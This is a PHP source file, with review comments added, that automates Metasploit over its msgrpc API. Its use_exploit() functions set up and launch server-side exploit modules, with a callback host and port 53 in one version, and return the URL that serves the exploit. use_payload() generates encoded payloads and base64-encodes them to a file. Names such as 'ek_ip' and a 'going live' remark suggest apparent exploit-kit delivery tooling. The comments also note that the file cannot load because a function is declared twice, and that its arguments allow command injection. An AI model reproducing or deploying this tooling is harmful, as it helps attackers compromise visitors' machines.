/**
 * Configures a Metasploit server-side module through the msgrpc console API
 * and returns the URL the module is expected to serve on.
 *
 * NOTE(review): a second use_exploit() with a different parameter list is
 * declared further down in this file. PHP does not permit redeclaring a
 * function, so loading this file as-is fails with "Cannot redeclare
 * use_exploit()"; one of the two definitions has to be renamed or removed.
 *
 * Every argument is concatenated verbatim into console command strings
 * ("set URIPATH /...", "set SRVPORT ...", "set TARGET ...", "set PAYLOAD ...")
 * and $msf_cmd_option is sent as a complete console command. Nothing is
 * validated here, so a value containing a newline or an extra command would
 * be executed by the console as-is; callers must not hand in values that
 * originate from an untrusted source (request parameters, uploaded config).
 *
 * The responses of the individual console commands are assigned to
 * $server_response but never inspected, so a failed "set" or "exploit -j"
 * is not detected by this function.
 *
 * @param string     $msgrpc_ip             msgrpc endpoint, handed to msf_auth()/msf_cmd()/msf_console()
 * @param string     $exploit_domain        host name used to build the returned URL
 * @param int|string $exploit_port          value for SRVPORT
 * @param string     $msf_exploit_full_path module path given to "use"
 * @param int        $msf_target            value for TARGET; the "set TARGET" is skipped when negative
 * @param string     $msf_payload_full_path value for PAYLOAD
 * @param string     $msf_cmd_option        one extra console command sent verbatim after "set PAYLOAD"
 * @param string     $msf_uripath           value for URIPATH (a leading "/" is prepended) and path of the returned URL
 * @param int        $msf_ssl               truthy selects "set SSL true", otherwise "set SSL false"
 * @return string URL built from $exploit_domain and $msf_uripath (always http://, see note below)
 */
function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option, $msf_uripath, $msf_ssl = 0) {
    debug("START Function use_exploit()");
    debug("msgrpc_ip: " . $msgrpc_ip);
    debug("exploit_domain: " . $exploit_domain);
    debug("exploit_port: " . $exploit_port);
    debug("msf_exploit_full_path: " . $msf_exploit_full_path);
    debug("msf_target: " . $msf_target);
    debug("msf_payload_full_path: " . $msf_payload_full_path);
    debug("msf_cmd_option: " . $msf_cmd_option);
    // WL_DOMAIN // EXPLOIT_DOMAIN // MSGRPC_IP

    // Authenticate, then open a dedicated console; all later commands are
    // issued against this console id.
    $token = msf_auth($msgrpc_ip);
    $client_request = array("core.version", $token);
    $server_response = msf_cmd($msgrpc_ip, $client_request);
    $client_request = array("console.create", $token);
    $server_response = msf_cmd($msgrpc_ip, $client_request);
    // NOTE(review): if console.create failed, "id" is missing here and every
    // following msf_console() call is made with a null console id.
    $console_id_one = $server_response["id"];
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "use " . $msf_exploit_full_path);
    //debug_r("server_response: " . $server_response);

    // Last path component of the module; only used for the debug line below
    // (the URL is built from $msf_uripath, not from this name).
    $msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1);
    debug("msf_exploit_name: " . $msf_exploit_name);

    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set URIPATH /" . $msf_uripath);
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SRVPORT " . $exploit_port);
    if ($msf_ssl) {
        $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SSL true");
    } else {
        $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SSL false");
    }
    // A negative target means "leave the module default".
    if ($msf_target >= 0) {
        $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set TARGET " . $msf_target);
    }
    // TODO: maybe remove when going live?
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set Retries true");
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set PAYLOAD " . $msf_payload_full_path);
    // $msf_cmd_option is passed through as a whole command string.
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, $msf_cmd_option);
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set DisablePayloadHandler true");
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $cb_ip);
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT " . $cb_port);
    // // // $server_response = msf_console($ek_ip, $token, $console_id_one, "set InitialAutoRunScript migrate -f");
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set InitialAutoRunScript run post/windows/manage/migrate");
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "exploit -j"); // use -j not -j -z
    // Output of "show options" is discarded as well; it only lands in the console buffer.
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "show options");

    // NOTE(review): both branches produce an http:// URL. The https:// form is
    // commented out, so with $msf_ssl set the returned URL does not match the
    // "set SSL true" issued above; this looks unintentional.
    if ($msf_ssl) {
        #$msf_url = 'https://' . $exploit_domain . '/' . $msf_exploit_name;
        $msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
    } else {
        #$msf_url = 'http://' . $exploit_domain . '/' . $msf_exploit_name;
        $msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
    }
    debug("msf_url: " . $msf_url);
    debug("END Function use_exploit()");
    return $msf_url;
}
/**
 * Generates a Metasploit payload file through the msgrpc console API and
 * reports whether the resulting file is non-empty.
 *
 * NOTE(review): msf_auth() is called here with three arguments ($ek_ip,
 * $ek_un, $ek_pw) while both use_exploit() variants in this file call it with
 * one; its definition is not visible here, so confirm the signature. $ek_un
 * and $ek_pw are credentials; they are not logged by this function, and any
 * debug output added later should keep it that way.
 *
 * All parameters are interpolated unescaped into console commands
 * ("set LHOST ...", "generate -t ... -f ... -e ...") and, for the "raw"
 * type, into shell commands ("cat ... | base64 -w 0 > ...", "rm ...") that
 * the console hands to the underlying shell. None of them is validated or
 * quoted here, so they must only come from trusted, operator-controlled
 * configuration.
 *
 * @param string     $ek_ip       msgrpc endpoint, handed to msf_auth()/msf_cmd()/msf_console()
 * @param string     $ek_un       msgrpc user name, handed to msf_auth()
 * @param string     $ek_pw       msgrpc password, handed to msf_auth()
 * @param string     $msf_payload payload module path given to "use"
 * @param string     $msf_type    value for "generate -t"; "raw" selects the two-step base64 path
 * @param string     $msf_rhost   value for RHOST
 * @param int|string $msf_rport   value for RPORT
 * @param string     $msf_lhost   value for LHOST
 * @param int|string $msf_lport   value for LPORT
 * @param string     $msf_encoder value for "generate -e"
 * @param string     $file_name   output file path; the result is checked with filesize()
 * @return bool true when $file_name exists with a size other than 0, false otherwise
 */
function use_payload($ek_ip, $ek_un, $ek_pw, $msf_payload, $msf_type, $msf_rhost, $msf_rport, $msf_lhost, $msf_lport, $msf_encoder, $file_name) {
    // Authenticate and open a console for this run.
    $token = msf_auth($ek_ip, $ek_un, $ek_pw);
    $client_request = array("core.version", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $client_request = array("console.create", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    // NOTE(review): "id" is read without checking that console.create succeeded.
    $console_id_one = $server_response["id"];
    $server_response = msf_console($ek_ip, $token, $console_id_one, "use " . $msf_payload);
    //debug("msf_payload: " . $msf_payload . "</BR>");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $msf_lhost);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set RHOST " . $msf_rhost);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set RPORT " . $msf_rport);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT " . $msf_lport);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set EXITFUNC thread");
    // Loose comparison; "raw" is a literal string so === would be the safer form.
    if ($msf_type == "raw") {
        // NOTE(review): the temp file name is the current Unix time in /tmp,
        // which is predictable and collides when two runs start in the same
        // second. tempnam() would give a unique, non-guessable name.
        $tmp_file = "/tmp/" . (string) time();
        // "\\x00" in a double-quoted PHP string is the literal text \x00, which
        // is what "-b" expects.
        $generated_payload = "generate -t " . $msf_type . " -f " . $tmp_file . " -b \\x00 -e " . $msf_encoder;
        //print $generated_payload;
        $server_response = msf_console($ek_ip, $token, $console_id_one, $generated_payload);
        // The sleeps give the console time to finish before the next command
        // is read; there is no check that generation actually completed.
        sleep(1);
        $server_response = msf_console($ek_ip, $token, $console_id_one, "cat " . $tmp_file . " | base64 -w 0 > " . $file_name);
        sleep(1);
        $server_response = msf_console($ek_ip, $token, $console_id_one, "rm " . $tmp_file);
    } else {
        $server_response = msf_console($ek_ip, $token, $console_id_one, "generate -t " . $msf_type . " -f " . $file_name . " -b \\x00 -e " . $msf_encoder);
    }
    // filesize() returns false (and emits a warning) when the file does not
    // exist; because false == 0 holds, that case also yields a false return.
    $fs = filesize($file_name);
    if ($fs == 0) {
        return false;
    } else {
        return true;
    }
    //return $server_response;
}
/**
 * Older variant of use_exploit(): configures a Metasploit server-side module
 * with fixed SRVPORT 80 and LPORT 53 and returns an http:// URL built from
 * $ek_ip and the module's last path component.
 *
 * NOTE(review): this is the second declaration of use_exploit() in this file
 * (the first one, with a nine-parameter signature, is above). PHP raises a
 * fatal "Cannot redeclare use_exploit()" error on load, so this definition
 * must be renamed or removed before the file can be included at all.
 *
 * As in the other variant, every argument is concatenated into console
 * commands without validation or quoting, and none of the console responses
 * is inspected for errors.
 *
 * @param string $ek_ip                 msgrpc endpoint, also used as host of the returned URL
 * @param string $cb_ip                 value for LHOST
 * @param string $msf_exploit_full_path module path given to "use"; its last "/"-separated part becomes URIPATH
 * @param string $msf_payload_full_path value for PAYLOAD
 * @param int    $msf_target            value for TARGET; skipped when negative (default -1)
 * @return string 'http://' . $ek_ip . '/' . <last path component of $msf_exploit_full_path>
 */
function use_exploit($ek_ip, $cb_ip, $msf_exploit_full_path, $msf_payload_full_path, $msf_target = -1) {
    debug("START Function use_exploit()</br>");
    // Authenticate and open a console; "id" is read without checking the
    // console.create response for an error.
    $token = msf_auth($ek_ip);
    $client_request = array("core.version", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $client_request = array("console.create", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $console_id_one = $server_response["id"];
    $server_response = msf_console($ek_ip, $token, $console_id_one, "use " . $msf_exploit_full_path);
    // Last path component of the module; doubles as URIPATH and as the URL path.
    // strrchr() returns false when there is no "/" in the path, in which case
    // this becomes an empty string.
    $msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1);
    debug("msf_exploit_name: " . $msf_exploit_name . "</BR>");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set URIPATH /" . $msf_exploit_name);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
    // A negative target means "leave the module default".
    if ($msf_target >= 0) {
        $server_response = msf_console($ek_ip, $token, $console_id_one, "set TARGET " . $msf_target);
    }
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set PAYLOAD " . $msf_payload_full_path);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $cb_ip);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT 53");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set DisablePayloadHandler true");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "exploit -j");
    // Output of "show options" is discarded.
    $server_response = msf_console($ek_ip, $token, $console_id_one, "show options");
    // Always http://; the port is not part of the URL because SRVPORT is 80.
    $msf_url = 'http://' . $ek_ip . '/' . $msf_exploit_name;
    debug("END Function use_exploit()</br>");
    return $msf_url;
}